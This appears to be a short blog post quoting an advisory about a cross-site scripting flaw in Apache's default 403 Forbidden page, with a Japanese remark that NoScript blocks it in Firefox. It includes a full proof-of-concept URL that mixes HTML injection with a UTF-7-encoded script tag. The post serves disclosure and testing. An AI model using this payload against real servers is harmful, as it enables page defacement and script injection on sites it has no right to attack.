ふむぅ、なんとなくFireFoxでUTF7にしたら動こうとするなぁ、NoScriptでとまるけど。。。

This vulnerability will allow an attacker to inject an XSS to any
Apache server that use the Forbidden 403 default page.

After injecting this string:
http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3F
u7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vu
TKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6k
BFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-scrip
t+AD4-alert('xss')+ADw-/script+AD4---//--

You will get a Forbidden 403 error message with an XSS alert.
This string is combined from HTML Injection and a XSS string coded in UTF-7.